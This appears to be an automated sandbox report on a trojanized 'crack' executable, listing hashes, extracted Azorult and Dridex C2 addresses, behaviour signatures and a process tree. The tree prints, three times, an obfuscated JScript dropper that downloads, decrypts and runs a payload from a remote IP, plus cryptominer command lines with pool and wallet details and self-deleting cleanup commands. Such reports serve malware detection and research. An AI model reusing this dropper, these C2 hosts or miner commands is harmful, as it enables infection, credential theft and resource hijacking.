Analysis

  • max time kernel
    1800s
  • max time network
    1804s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    03/04/2021, 07:46

General

  • Target

    Cd.Completo.Gioco.Online.Casin.crack.exe

  • Size

    5.4MB

  • MD5

    baad366f257529076340afc66d1ac59c

  • SHA1

    3dafcc431b85bd6a527e70879137e1f27e160849

  • SHA256

    3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975

  • SHA512

    98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

dridex

Botnet

10111

C2

210.65.244.183:8443

216.10.251.121:6601

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Dridex Loader 2 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • XMRig Miner Payload 4 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 54 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        PID:852
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2628
    • C:\Users\Admin\AppData\Local\Temp\Cd.Completo.Gioco.Online.Casin.crack.exe
      "C:\Users\Admin\AppData\Local\Temp\Cd.Completo.Gioco.Online.Casin.crack.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:764
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:820
            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
              5⤵
              • Executes dropped EXE
              PID:1488
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1148
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1144
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:1648
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1532
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2012
            • C:\Users\Admin\AppData\Local\Temp\SAFCTKWQWD\multitimer.exe
              "C:\Users\Admin\AppData\Local\Temp\SAFCTKWQWD\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
              5⤵
              • Executes dropped EXE
              PID:1748
              • C:\Users\Admin\AppData\Local\Temp\SAFCTKWQWD\multitimer.exe
                "C:\Users\Admin\AppData\Local\Temp\SAFCTKWQWD\multitimer.exe" 1 101
                6⤵
                • Executes dropped EXE
                PID:2096
            • C:\Users\Admin\AppData\Local\Temp\ZZXUYAGXG7\setups.exe
              "C:\Users\Admin\AppData\Local\Temp\ZZXUYAGXG7\setups.exe" ll
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1936
              • C:\Users\Admin\AppData\Local\Temp\is-2KCBF.tmp\setups.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-2KCBF.tmp\setups.tmp" /SL5="$201BA,635399,250368,C:\Users\Admin\AppData\Local\Temp\ZZXUYAGXG7\setups.exe" ll
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:568
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
                  7⤵
                  • Modifies Internet Explorer settings
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  PID:1568
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:275457 /prefetch:2
                    8⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:412
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MjU1Mzc4&xYcXDw&s2ht4=zRGUWVxoqbk63PE52pZDLGpbf1DB6gqV6AH16-t_d0erZOfQe5zUGwfAY3lIpcU14b9aqvj0KBnBLJh5OGqxaNYg5CqZaVFrJt3F7yy7ISecghxBWG6GID_OkYU14gvA5Tn6r7&oa1n4=xH3QMrLYbRvFFYbfLfjKRqFbNU&fkaolMzU4MA==" "2"
                      9⤵
                        PID:2748
                        • C:\Windows\SysWOW64\wscript.exe
                          wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MjU1Mzc4&xYcXDw&s2ht4=zRGUWVxoqbk63PE52pZDLGpbf1DB6gqV6AH16-t_d0erZOfQe5zUGwfAY3lIpcU14b9aqvj0KBnBLJh5OGqxaNYg5CqZaVFrJt3F7yy7ISecghxBWG6GID_OkYU14gvA5Tn6r7&oa1n4=xH3QMrLYbRvFFYbfLfjKRqFbNU&fkaolMzU4MA==" "2"
                          10⤵
                          • Blocklisted process makes network request
                          PID:2820
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c 1syky.exe
                            11⤵
                            • Loads dropped DLL
                            PID:2304
                            • C:\Users\Admin\AppData\Local\Temp\1syky.exe
                              1syky.exe
                              12⤵
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              PID:1356
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:799760 /prefetch:2
                      8⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2468
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:472085 /prefetch:2
                      8⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2784
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MjA0NTY=&AGeD&s2ht4=Yn6rSCJqvfzSk2beIEBjw8V7dTjvSgfBOLq1TbgC-iQeELgEOmMxZC1lE9LeqzkKNzVafsJPX_hCJYwlA_MaWELIz3Fr2z7UWdMIjlBWF6jNUnulMVl0U6QkTn6jPHqLLqUd0UEY1UgnKfJoipUvBVSS5NWtwsfO-Qzpxq-2T8rd3n5Qd&oa1n4=x33QdfWYaRuPCYjEM_jdSqRBP0zYGViPxY2&ESJweNDU4Mw==" "2"
                        9⤵
                          PID:524
                          • C:\Windows\SysWOW64\wscript.exe
                            wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MjA0NTY=&AGeD&s2ht4=Yn6rSCJqvfzSk2beIEBjw8V7dTjvSgfBOLq1TbgC-iQeELgEOmMxZC1lE9LeqzkKNzVafsJPX_hCJYwlA_MaWELIz3Fr2z7UWdMIjlBWF6jNUnulMVl0U6QkTn6jPHqLLqUd0UEY1UgnKfJoipUvBVSS5NWtwsfO-Qzpxq-2T8rd3n5Qd&oa1n4=x33QdfWYaRuPCYjEM_jdSqRBP0zYGViPxY2&ESJweNDU4Mw==" "2"
                            10⤵
                            • Blocklisted process makes network request
                            PID:2056
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c 2k29q.exe
                              11⤵
                              • Loads dropped DLL
                              PID:1660
                              • C:\Users\Admin\AppData\Local\Temp\2k29q.exe
                                2k29q.exe
                                12⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                PID:1716
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:865340 /prefetch:2
                        8⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:2480
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:1324082 /prefetch:2
                        8⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1292
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?NDg0MjA0&UCvDV&oa1n4=x3rQcvWYaRyPDojDM__dTaRBP0vYHliPxYq&s2ht4=YmKrSCJ2vfzSk2bCIFxj38V7dSTvSgfBOKa1Ubge-jgeELgYOmMxZC1lE87eqzkWNylaYsJPQ_h2OMw5B_MaWF7I5217xz7IcdMIjlBWF6mRUyulIUVwU5AkXmP_PRKXJqRZzVEEzVQvNfp0lok7BBSS8NWtwsfOyQzt2q-2T9bdwn5Qd&HJthqMeHNDA1OQ==" "2"
                          9⤵
                            PID:1700
                            • C:\Windows\SysWOW64\wscript.exe
                              wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?NDg0MjA0&UCvDV&oa1n4=x3rQcvWYaRyPDojDM__dTaRBP0vYHliPxYq&s2ht4=YmKrSCJ2vfzSk2bCIFxj38V7dSTvSgfBOKa1Ubge-jgeELgYOmMxZC1lE87eqzkWNylaYsJPQ_h2OMw5B_MaWF7I5217xz7IcdMIjlBWF6mRUyulIUVwU5AkXmP_PRKXJqRZzVEEzVQvNfp0lok7BBSS8NWtwsfOyQzt2q-2T9bdwn5Qd&HJthqMeHNDA1OQ==" "2"
                              10⤵
                              • Blocklisted process makes network request
                              PID:956
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c z0c1q.exe
                                11⤵
                                • Loads dropped DLL
                                PID:824
                                • C:\Users\Admin\AppData\Local\Temp\z0c1q.exe
                                  z0c1q.exe
                                  12⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  PID:1076
                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                  4⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1844
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    5⤵
                      PID:1940
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        6⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:632
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    PID:2312
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                      5⤵
                        PID:2364
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                          6⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2536
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Modifies data under HKEY_USERS
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2388
                      • C:\Users\Admin\AppData\Roaming\23B8.tmp.exe
                        "C:\Users\Admin\AppData\Roaming\23B8.tmp.exe"
                        5⤵
                          PID:2716
                          • C:\Users\Admin\AppData\Roaming\23B8.tmp.exe
                            "C:\Users\Admin\AppData\Roaming\23B8.tmp.exe"
                            6⤵
                              PID:2908
                          • C:\Users\Admin\AppData\Roaming\2649.tmp.exe
                            "C:\Users\Admin\AppData\Roaming\2649.tmp.exe"
                            5⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of SetThreadContext
                            • Modifies system certificate store
                            PID:2768
                            • C:\Windows\system32\msiexec.exe
                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                              6⤵
                                PID:3008
                              • C:\Windows\system32\msiexec.exe
                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                                6⤵
                                • Blocklisted process makes network request
                                PID:3056
                            • C:\Users\Admin\AppData\Roaming\26E6.tmp.exe
                              "C:\Users\Admin\AppData\Roaming\26E6.tmp.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:2832
                              • C:\Windows\SysWOW64\cmd.exe
                                /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\26E6.tmp.exe
                                6⤵
                                  PID:2296
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 3
                                    7⤵
                                    • Delays execution with timeout.exe
                                    PID:2504
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                5⤵
                                  PID:2528
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1
                                    6⤵
                                    • Runs ping.exe
                                    PID:2436
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:2568
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:2716
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2908
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2876
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1748
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1700
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:748
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                              keygen-step-1.exe
                              3⤵
                              • Executes dropped EXE
                              PID:932

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/568-84-0x0000000000240000-0x0000000000241000-memory.dmp

                          Filesize

                          4KB

                        • memory/820-121-0x00000000000A0000-0x00000000000A1000-memory.dmp

                          Filesize

                          4KB

                        • memory/820-123-0x0000000000090000-0x00000000000AB000-memory.dmp

                          Filesize

                          108KB

                        • memory/820-83-0x0000000002670000-0x000000000275F000-memory.dmp

                          Filesize

                          956KB

                        • memory/820-46-0x0000000000F80000-0x000000000111C000-memory.dmp

                          Filesize

                          1.6MB

                        • memory/852-124-0x0000000000A30000-0x0000000000A74000-memory.dmp

                          Filesize

                          272KB

                        • memory/852-130-0x0000000000E60000-0x0000000000EC7000-memory.dmp

                          Filesize

                          412KB

                        • memory/956-208-0x0000000002820000-0x0000000002824000-memory.dmp

                          Filesize

                          16KB

                        • memory/1356-159-0x0000000000400000-0x000000000043D000-memory.dmp

                          Filesize

                          244KB

                        • memory/1356-162-0x0000000000220000-0x000000000025C000-memory.dmp

                          Filesize

                          240KB

                        • memory/1356-163-0x0000000000400000-0x000000000043D000-memory.dmp

                          Filesize

                          244KB

                        • memory/1488-52-0x0000000000400000-0x0000000000983000-memory.dmp

                          Filesize

                          5.5MB

                        • memory/1488-45-0x0000000000400000-0x0000000000983000-memory.dmp

                          Filesize

                          5.5MB

                        • memory/1748-60-0x00000000006D0000-0x00000000006D2000-memory.dmp

                          Filesize

                          8KB

                        • memory/1748-86-0x000007FEF0F20000-0x000007FEF18BD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/1748-59-0x000007FEF0F20000-0x000007FEF18BD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/1916-51-0x000007FEF7020000-0x000007FEF729A000-memory.dmp

                          Filesize

                          2.5MB

                        • memory/1936-82-0x0000000000401000-0x000000000040C000-memory.dmp

                          Filesize

                          44KB

                        • memory/2004-2-0x0000000075EA1000-0x0000000075EA3000-memory.dmp

                          Filesize

                          8KB

                        • memory/2012-53-0x0000000000DB0000-0x0000000000DB1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2012-38-0x000007FEF4FD0000-0x000007FEF59BC000-memory.dmp

                          Filesize

                          9.9MB

                        • memory/2012-55-0x000000001B160000-0x000000001B162000-memory.dmp

                          Filesize

                          8KB

                        • memory/2096-97-0x0000000000B40000-0x0000000000B42000-memory.dmp

                          Filesize

                          8KB

                        • memory/2096-94-0x000007FEF0F20000-0x000007FEF18BD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/2096-95-0x000007FEF0F20000-0x000007FEF18BD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/2364-122-0x0000000002610000-0x0000000002614000-memory.dmp

                          Filesize

                          16KB

                        • memory/2388-112-0x0000000000020000-0x000000000002D000-memory.dmp

                          Filesize

                          52KB

                        • memory/2388-143-0x00000000023B0000-0x00000000023F8000-memory.dmp

                          Filesize

                          288KB

                        • memory/2536-127-0x0000000000770000-0x00000000007C6000-memory.dmp

                          Filesize

                          344KB

                        • memory/2536-126-0x00000000001A0000-0x00000000001DA000-memory.dmp

                          Filesize

                          232KB

                        • memory/2628-182-0x00000000028D0000-0x00000000029D3000-memory.dmp

                          Filesize

                          1.0MB

                        • memory/2628-132-0x0000000000450000-0x00000000004B7000-memory.dmp

                          Filesize

                          412KB

                        • memory/2716-139-0x0000000001950000-0x0000000001961000-memory.dmp

                          Filesize

                          68KB

                        • memory/2716-176-0x0000000000510000-0x0000000000511000-memory.dmp

                          Filesize

                          4KB

                        • memory/2716-144-0x00000000017A0000-0x00000000017E7000-memory.dmp

                          Filesize

                          284KB

                        • memory/2716-177-0x000000001AF00000-0x000000001AF02000-memory.dmp

                          Filesize

                          8KB

                        • memory/2716-171-0x000007FEF4F30000-0x000007FEF591C000-memory.dmp

                          Filesize

                          9.9MB

                        • memory/2716-172-0x0000000000F60000-0x0000000000F61000-memory.dmp

                          Filesize

                          4KB

                        • memory/2716-174-0x0000000000440000-0x0000000000441000-memory.dmp

                          Filesize

                          4KB

                        • memory/2716-175-0x0000000000450000-0x000000000048C000-memory.dmp

                          Filesize

                          240KB

                        • memory/2768-140-0x000007FEFB891000-0x000007FEFB893000-memory.dmp

                          Filesize

                          8KB

                        • memory/2832-149-0x0000000007120000-0x000000000C59C000-memory.dmp

                          Filesize

                          84.5MB

                        • memory/2832-156-0x0000000000400000-0x000000000587C000-memory.dmp

                          Filesize

                          84.5MB

                        • memory/2908-145-0x0000000000400000-0x000000000044E000-memory.dmp

                          Filesize

                          312KB

                        • memory/2908-141-0x0000000000400000-0x000000000044E000-memory.dmp

                          Filesize

                          312KB

                        • memory/3008-150-0x0000000140000000-0x0000000140383000-memory.dmp

                          Filesize

